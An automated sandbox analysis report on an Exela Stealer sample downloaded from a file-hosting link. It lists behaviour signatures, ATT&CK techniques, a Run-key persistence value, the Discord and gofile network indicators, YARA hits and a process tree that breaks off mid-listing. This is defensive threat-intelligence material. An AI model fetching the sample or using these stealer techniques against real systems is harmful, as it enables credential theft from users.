exelastealer | hxxps://gofile[.]io/d/TEVLCX

Resubmissions

25/03/2025, 16:54

250325-verekssqz6 10

25/03/2025, 16:51

250325-vc1kgayzb1 10

Analysis

max time kernel
63s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
25/03/2025, 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/TEVLCX

Score

10^/10

exelastealer collection defense_evasion discovery persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Exelastealer family
exelastealer
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Downloads MZ/PE file 1 IoCs

flow	pid	Process
75	5552	msedge.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3644	netsh.exe
540	netsh.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1332	cmd.exe
1808	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
6004	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
4544	TeraFix Stealer.exe
4980	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
6068	TeraFix Stealer.exe
5336	TeraFix Stealer.exe
1400	TeraFix Stealer.exe
5280	TeraFix Stealer.exe

Loads dropped DLL 64 IoCs

pid	Process
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
5336	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5336	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
5344	TeraFix Stealer.exe
5152	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
1344	TeraFix Stealer.exe
5152	TeraFix Stealer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
43	api.gofile.io
123	discord.com
129	api.gofile.io
122	discord.com
124	discord.com
130	api.gofile.io
147	discord.com
39	api.gofile.io
40	api.gofile.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
107	ip-api.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4740	cmd.exe
2004	ARP.EXE

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4312	tasklist.exe
2624	tasklist.exe
3256	tasklist.exe
4984	tasklist.exe
848	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6056	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000242fe-254.dat	upx
behavioral1/memory/5344-258-0x00007FFAD4050000-0x00007FFAD4638000-memory.dmp	upx
behavioral1/files/0x00070000000242cb-260.dat	upx
behavioral1/files/0x00070000000242f8-266.dat	upx
behavioral1/files/0x00070000000242d0-282.dat	upx
behavioral1/files/0x00070000000242cf-281.dat	upx
behavioral1/files/0x00070000000242ce-280.dat	upx
behavioral1/files/0x00070000000242cd-279.dat	upx
behavioral1/files/0x00070000000242cc-278.dat	upx
behavioral1/files/0x00070000000242ca-277.dat	upx
behavioral1/files/0x00070000000242c9-276.dat	upx
behavioral1/files/0x00070000000242c8-275.dat	upx
behavioral1/files/0x0007000000024301-274.dat	upx
behavioral1/files/0x0007000000024300-273.dat	upx
behavioral1/files/0x00070000000242ff-272.dat	upx
behavioral1/files/0x00070000000242fc-271.dat	upx
behavioral1/files/0x000b000000023c11-270.dat	upx
behavioral1/files/0x00070000000242f7-269.dat	upx
behavioral1/memory/5344-268-0x00007FFAF82E0000-0x00007FFAF82EF000-memory.dmp	upx
behavioral1/memory/5344-267-0x00007FFAE99A0000-0x00007FFAE99C4000-memory.dmp	upx
behavioral1/files/0x00070000000242d2-284.dat	upx
behavioral1/files/0x00070000000242d1-283.dat	upx
behavioral1/files/0x00070000000242d5-287.dat	upx
behavioral1/files/0x00070000000242d4-286.dat	upx
behavioral1/files/0x00070000000242d3-285.dat	upx
behavioral1/memory/5344-289-0x00007FFAF7230000-0x00007FFAF7249000-memory.dmp	upx
behavioral1/memory/5344-291-0x00007FFAD6440000-0x00007FFAD646D000-memory.dmp	upx
behavioral1/memory/5344-293-0x00007FFAD6210000-0x00007FFAD6229000-memory.dmp	upx
behavioral1/memory/5344-295-0x00007FFAF7D60000-0x00007FFAF7D6D000-memory.dmp	upx
behavioral1/memory/5344-297-0x00007FFAD4020000-0x00007FFAD4043000-memory.dmp	upx
behavioral1/memory/5344-299-0x00007FFAD3EA0000-0x00007FFAD4013000-memory.dmp	upx
behavioral1/memory/5344-301-0x00007FFAD3E70000-0x00007FFAD3E9E000-memory.dmp	upx
behavioral1/memory/5344-308-0x00007FFAD3A30000-0x00007FFAD3DA5000-memory.dmp	upx
behavioral1/memory/5344-307-0x00007FFAE99A0000-0x00007FFAE99C4000-memory.dmp	upx
behavioral1/memory/5344-304-0x00007FFAD3DB0000-0x00007FFAD3E68000-memory.dmp	upx
behavioral1/memory/5344-303-0x00007FFAD4050000-0x00007FFAD4638000-memory.dmp	upx
behavioral1/memory/5344-313-0x00007FFAD5CE0000-0x00007FFAD5CF2000-memory.dmp	upx
behavioral1/memory/5344-312-0x00007FFAD5D30000-0x00007FFAD5D45000-memory.dmp	upx
behavioral1/files/0x00030000000233ed-314.dat	upx
behavioral1/memory/5344-317-0x00007FFAD5CC0000-0x00007FFAD5CD4000-memory.dmp	upx
behavioral1/memory/5344-316-0x00007FFAD6210000-0x00007FFAD6229000-memory.dmp	upx
behavioral1/memory/5344-319-0x00007FFAD5CA0000-0x00007FFAD5CB4000-memory.dmp	upx
behavioral1/memory/5344-321-0x00007FFAD4020000-0x00007FFAD4043000-memory.dmp	upx
behavioral1/memory/5344-322-0x00007FFAD3EA0000-0x00007FFAD4013000-memory.dmp	upx
behavioral1/memory/5344-323-0x00007FFAD5B80000-0x00007FFAD5C9C000-memory.dmp	upx
behavioral1/files/0x0007000000024303-324.dat	upx
behavioral1/memory/5344-327-0x00007FFAD3E70000-0x00007FFAD3E9E000-memory.dmp	upx
behavioral1/memory/5344-326-0x00007FFAD5B30000-0x00007FFAD5B4B000-memory.dmp	upx
behavioral1/memory/5344-325-0x00007FFAD5B50000-0x00007FFAD5B72000-memory.dmp	upx
behavioral1/memory/1344-407-0x00007FFAD3440000-0x00007FFAD3A28000-memory.dmp	upx
behavioral1/memory/5344-422-0x00007FFAD3A30000-0x00007FFAD3DA5000-memory.dmp	upx
behavioral1/memory/5344-391-0x00007FFAD3DB0000-0x00007FFAD3E68000-memory.dmp	upx
behavioral1/memory/5344-426-0x00007FFAD5A60000-0x00007FFAD5A71000-memory.dmp	upx
behavioral1/memory/5344-425-0x00007FFAD5A80000-0x00007FFAD5ACD000-memory.dmp	upx
behavioral1/memory/5344-424-0x00007FFAD5AD0000-0x00007FFAD5AE9000-memory.dmp	upx
behavioral1/memory/5344-474-0x00007FFAF7570000-0x00007FFAF757A000-memory.dmp	upx
behavioral1/memory/5344-473-0x00007FFAD5A20000-0x00007FFAD5A53000-memory.dmp	upx
behavioral1/memory/1344-484-0x00007FFAD25F0000-0x00007FFAD261E000-memory.dmp	upx
behavioral1/memory/1344-485-0x00007FFAD2270000-0x00007FFAD25E5000-memory.dmp	upx
behavioral1/memory/5344-496-0x00007FFAD2C40000-0x00007FFAD343E000-memory.dmp	upx
behavioral1/memory/1344-498-0x00007FFAD5940000-0x00007FFAD5959000-memory.dmp	upx
behavioral1/memory/1344-497-0x00007FFAD5990000-0x00007FFAD59A9000-memory.dmp	upx
behavioral1/memory/5336-501-0x00007FFAD1BC0000-0x00007FFAD21A8000-memory.dmp	upx
behavioral1/memory/5152-558-0x00007FFAD1270000-0x00007FFAD1282000-memory.dmp	upx

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4684	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00080000000242a2-173.dat	pyinstaller

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1000	cmd.exe
4992	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4960	NETSTAT.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
4724	WMIC.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5244	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6000	ipconfig.exe
4960	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3904	systeminfo.exe

Kills process with taskkill 11 IoCs

defense_evasion

pid	Process
4016	taskkill.exe
1284	taskkill.exe
5616	taskkill.exe
6052	taskkill.exe
1168	taskkill.exe
5244	taskkill.exe
4656	taskkill.exe
328	taskkill.exe
3804	taskkill.exe
1460	taskkill.exe
2400	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133873950940921187"	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{3D7863CB-A2BE-4C78-B559-CCDBDEC8738D}	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	6072	WMIC.exe
Token: SeSecurityPrivilege	6072	WMIC.exe
Token: SeTakeOwnershipPrivilege	6072	WMIC.exe
Token: SeLoadDriverPrivilege	6072	WMIC.exe
Token: SeSystemProfilePrivilege	6072	WMIC.exe
Token: SeSystemtimePrivilege	6072	WMIC.exe
Token: SeProfSingleProcessPrivilege	6072	WMIC.exe
Token: SeIncBasePriorityPrivilege	6072	WMIC.exe
Token: SeCreatePagefilePrivilege	6072	WMIC.exe
Token: SeBackupPrivilege	6072	WMIC.exe
Token: SeRestorePrivilege	6072	WMIC.exe
Token: SeShutdownPrivilege	6072	WMIC.exe
Token: SeDebugPrivilege	6072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6072	WMIC.exe
Token: SeRemoteShutdownPrivilege	6072	WMIC.exe
Token: SeUndockPrivilege	6072	WMIC.exe
Token: SeManageVolumePrivilege	6072	WMIC.exe
Token: 33	6072	WMIC.exe
Token: 34	6072	WMIC.exe
Token: 35	6072	WMIC.exe
Token: 36	6072	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5244	WMIC.exe
Token: SeSecurityPrivilege	5244	WMIC.exe
Token: SeTakeOwnershipPrivilege	5244	WMIC.exe
Token: SeLoadDriverPrivilege	5244	WMIC.exe
Token: SeSystemProfilePrivilege	5244	WMIC.exe
Token: SeSystemtimePrivilege	5244	WMIC.exe
Token: SeProfSingleProcessPrivilege	5244	WMIC.exe
Token: SeIncBasePriorityPrivilege	5244	WMIC.exe
Token: SeCreatePagefilePrivilege	5244	WMIC.exe
Token: SeBackupPrivilege	5244	WMIC.exe
Token: SeRestorePrivilege	5244	WMIC.exe
Token: SeShutdownPrivilege	5244	WMIC.exe
Token: SeDebugPrivilege	5244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5244	WMIC.exe
Token: SeRemoteShutdownPrivilege	5244	WMIC.exe
Token: SeUndockPrivilege	5244	WMIC.exe
Token: SeManageVolumePrivilege	5244	WMIC.exe
Token: 33	5244	WMIC.exe
Token: 34	5244	WMIC.exe
Token: 35	5244	WMIC.exe
Token: 36	5244	WMIC.exe
Token: SeDebugPrivilege	848	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6072	WMIC.exe
Token: SeSecurityPrivilege	6072	WMIC.exe
Token: SeTakeOwnershipPrivilege	6072	WMIC.exe
Token: SeLoadDriverPrivilege	6072	WMIC.exe
Token: SeSystemProfilePrivilege	6072	WMIC.exe
Token: SeSystemtimePrivilege	6072	WMIC.exe
Token: SeProfSingleProcessPrivilege	6072	WMIC.exe
Token: SeIncBasePriorityPrivilege	6072	WMIC.exe
Token: SeCreatePagefilePrivilege	6072	WMIC.exe
Token: SeBackupPrivilege	6072	WMIC.exe
Token: SeRestorePrivilege	6072	WMIC.exe
Token: SeShutdownPrivilege	6072	WMIC.exe
Token: SeDebugPrivilege	6072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6072	WMIC.exe
Token: SeRemoteShutdownPrivilege	6072	WMIC.exe
Token: SeUndockPrivilege	6072	WMIC.exe
Token: SeManageVolumePrivilege	6072	WMIC.exe
Token: 33	6072	WMIC.exe
Token: 34	6072	WMIC.exe
Token: 35	6072	WMIC.exe
Token: 36	6072	WMIC.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 5968	2692	msedge.exe	86
PID 2692 wrote to memory of 5968	2692	msedge.exe	86
PID 2692 wrote to memory of 5552	2692	msedge.exe	87
PID 2692 wrote to memory of 5552	2692	msedge.exe	87
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 3640	2692	msedge.exe	88
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89
PID 2692 wrote to memory of 5492	2692	msedge.exe	89

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5292	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/TEVLCX
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffaf7a7f208,0x7ffaf7a7f214,0x7ffaf7a7f220
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1760,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=2636 /prefetch:8
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4960,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3744,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=4300 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3592,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3452,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:8
  2⤵
  PID:2052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
